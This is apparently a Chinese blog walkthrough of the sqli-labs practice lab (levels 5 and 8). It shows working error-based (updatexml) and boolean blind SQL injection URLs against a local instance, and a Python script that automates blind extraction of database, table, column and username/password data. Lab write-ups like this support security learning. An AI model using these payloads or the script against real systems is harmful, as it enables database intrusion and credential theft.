sqllabs通关

sqllabs5:(报错注入)

sql 复制代码
?id=1  回显You are in...........
?id=2-1  回显You are in...........
?id=1'  回显'  '1'' LIMIT 0,1  '
           
判断是字符型,'闭合。
sql 复制代码
?id=1'order by 3--+    //页面显示正常

我们试了4行得出是报错注入

我们先爆库名

sql 复制代码
http://127.0.0.1/sqli-labs-master/Less-5/?id='and updatexml(1,concat(0x7e,(select database()),0x7e),3)--+

拿下库名:security

爆表名

sql 复制代码
http://127.0.0.1/sqli-labs-master/Less-5/?id=-1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)),1)%20--+

拿下表名

然后爆字段:

sql 复制代码
http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),1) --+

爆数据:

sql 复制代码
http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)),1) --+

数据不完整,因为updatexml()函数的报错内容不超过32个字符,所以我们还需要对数据进行处理

使用substring()函数对结果字符进行处理

sql 复制代码
?id=-1' and updatexml(1,concat(0x7e,substring((select group_concat(username,0x7e,password) from users),32,64)),1) --+

之后我们就可以不断改变位置,这样我们就可以得到所有数据,后续的操作不再演示

sqllabs8:布尔盲注

报错注入被注释掉了

联合查询只出现you are in ..........

所以这里我们能看见一真一假(页面特征)

不加'时为真

sql 复制代码
http://127.0.0.1/sqli-labs-master/Less-8/?id=1

加入'时为假

sql 复制代码
http://127.0.0.1/sqli-labs-master/Less-8/?id=1'

我们可以用布尔盲注

我们数据库名:

security,s的ascii码是115,我们可以一个一个试一试

sql 复制代码
http://127.0.0.1/sqli-labs-master/Less-8//?id=1' and ascii(substring((select database()),1,1))=115--+

利用二分法和ASCII码进行渗透:

根据此现象我们写一个python脚本快速进行注入

python 复制代码
import time
import requests

url = 'http://127.0.0.1/sqli-labs-master/Less-8/index.php'


def inject_database(url):
    name = ''
    for i in range(1, 50):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr(database(), %d, 1)) > %d-- " % (i, mid)
            res = {"id": payload}
            # start_time = time.time()
            r = requests.get(url, params=res)
            # end_time = time.time()
            if 'You are in...........' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

inject_database(url)

爆库名;

爆表名:

python 复制代码
payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()), %d, 1)) > %d-- " % (i, mid)

爆列名:

python 复制代码
payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), %d, 1)) > %d-- " % (i, mid)

爆数据:

python 复制代码
payload = "1' and ascii(substr((select group_concat(username,'$',password) from users), %d, 1)) > %d-- " % (i, mid)
相关推荐
无敌岩雀几秒前
MySQL中的索引
数据库·mysql
a_安徒生23 分钟前
linux安装TDengine
linux·数据库·tdengine
程序员学习随笔26 分钟前
PostgreSQL技术内幕19:逻辑备份工具pg_dump、pg_dumpall
数据库·postgresql
尘浮生1 小时前
Java项目实战II基于微信小程序的校运会管理系统(开发文档+数据库+源码)
java·开发语言·数据库·微信小程序·小程序·maven·intellij-idea
偶尔。5351 小时前
什么是事务?事务有哪些特性?
数据库·oracle
安迁岚1 小时前
【SQL Server】华中农业大学空间数据库实验报告 实验六 视图
数据库·sql·mysql·oracle·实验报告
xoxo-Rachel1 小时前
(超级详细!!!)解决“com.mysql.jdbc.Driver is deprecated”警告:详解与优化
java·数据库·mysql
vortex51 小时前
信息收集系列(六):路径爬取与目录爆破
网络安全·渗透·信息收集
JH30732 小时前
Oracle与MySQL中CONCAT()函数的使用差异
数据库·mysql·oracle
蓝染-惣右介2 小时前
【MyBatisPlus·最新教程】包含多个改造案例,常用注解、条件构造器、代码生成、静态工具、类型处理器、分页插件、自动填充字段
java·数据库·tomcat·mybatis